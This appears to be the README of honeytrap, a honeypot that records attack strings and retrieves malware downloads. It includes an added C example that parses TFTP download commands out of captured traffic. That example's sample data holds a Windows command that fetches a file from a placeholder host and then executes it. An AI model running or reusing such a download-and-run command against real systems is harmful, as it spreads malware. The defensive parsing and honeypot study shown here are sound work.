
honeytrap's Introduction

README

  Honeytrap is a network security tool written to observe attacks
  against TCP or UDP services. It runs as a daemon and starts server
  processes dynamically on requested ports. A server emulates a
  well-known service by simply sending captured network traffic to
  a connected host.

  Many clients, and particularly attackers, will be fooled and send
  responses to a honeytrap server process. The arriving data is
  assembled into a string and written to a database file. Such a
  string is called an attack string.

  Honeytrap can parse an attack string for commands advising the
  server to download a file from another host. If a download
  command is found, the server tries to retrieve the corresponding
  file automatically. A downloaded file is stored locally with an
  MD5 checksum in its name. Currently, only FTP and TFTP are
  supported. Honeytrap implements its own clients with the aim of
  behaving as similarly as possible to Windows systems. HTTP URIs
  are recognized and logged. An HTTP download routine may be added
  in future releases.
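
  The attack-string parsing described above, as an added example that
  is not honeytrap's own code: it scans a captured attack string for a
  TFTP download command and rejects hosts with unexpected characters.
  The command form 'tftp [-i] <host> get <file>', the names tftp_cmd,
  take_token and find_tftp_download, and the sample bytes are
  assumptions made for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>

/* Added example, not honeytrap's own parser. Assumed command form:
 * tftp [-i] <host> get <file>. SAMPLE is constructed: binary prefix + NUL + command. */
struct tftp_cmd { char host[64]; char file[128]; };
static const char HOST_CHARS[] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789.-";
static const unsigned char SAMPLE[] = "\x90\x90\x00" "cmd /c tftp -i 192.0.2.10 GET sample.bin&sample.bin\r\n";

/* Copy one blank-delimited token, stopping at shell separators; 0 = none or too long. */
static size_t take_token(const unsigned char *p, size_t n, char *out, size_t outsz)
{
    size_t i = 0, len = 0;
    while (i < n && (p[i] == ' ' || p[i] == '\t')) i++;
    while (i < n && isgraph(p[i]) && !strchr("&|;", p[i])) {
        if (len + 1 >= outsz) return 0;   /* reject oversized input, never truncate */
        out[len++] = (char)p[i++];
    }
    out[len] = '\0';
    return len ? i : 0;
}

/* Scan n raw bytes (NUL bytes allowed); returns 1 and fills *cmd on first match, else 0. */
int find_tftp_download(const unsigned char *buf, size_t n, struct tftp_cmd *cmd)
{
    char t[4][128];
    int k, o;
    for (size_t i = 0; i + 4 <= n; i++) {
        if (strncasecmp((const char *)buf + i, "tftp", 4) != 0) continue;
        const unsigned char *p = buf + i + 4;
        size_t left = n - i - 4, used;
        if (left == 0 || (*p != ' ' && *p != '\t')) continue;   /* e.g. "tftpd" */
        for (k = 0; k < 4 && (used = take_token(p, left, t[k], sizeof t[k])); k++) { p += used; left -= used; }
        o = (k > 0 && strcmp(t[0], "-i") == 0);   /* optional binary-transfer flag */
        if (k < o + 3 || strcasecmp(t[o + 1], "get") != 0) continue;
        /* Host is attacker-controlled: bound its length and character set. */
        if (strlen(t[o]) >= sizeof cmd->host || t[o][strspn(t[o], HOST_CHARS)] != '\0') continue;
        strcpy(cmd->host, t[o]); strcpy(cmd->file, t[o + 2]);
        return 1;
    }
    return 0;
}

int main(void)
{
    struct tftp_cmd c;
    if (find_tftp_download(SAMPLE, sizeof SAMPLE - 1, &c)) printf("host=%s file=%s\n", c.host, c.file);
    return 0;
}
```

  The extracted file name is also attacker-controlled and should never
  be used as a local path; naming stored files by checksum, as the
  README describes, avoids that.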

INSTALLATION

  Installation of honeytrap is pretty straightforward. Just run
  './configure --with-stream-mon=<type> && make && make install'
  where '<type>' is the connection monitor type of your choice.
  Please refer to the INSTALL file and to the output of
  './configure --help' for further information.

WARNINGS

  Honeytrap is a low-interaction honeypot and therefore detectable.
  It is written in C and thus potentially vulnerable to buffer
  overflow attacks. Take care. Running in mirror mode is dangerous:
  attacks may be directed back at the attacker, appearing to come
  from your system. Use with caution.

  The program needs root privileges, but only for binding server
  processes to well-known ports. Use the -u and -g command line
  options to drop privileges and switch to another user and group
  as early as possible.

CONTACT

  If you have problems, questions, ideas or suggestions, please
  contact me at <[email protected]>. If you would like to help
  make honeytrap better, you are welcome.

honeytrap's People

Contributors

adepasquale, tillmannw, armedpot
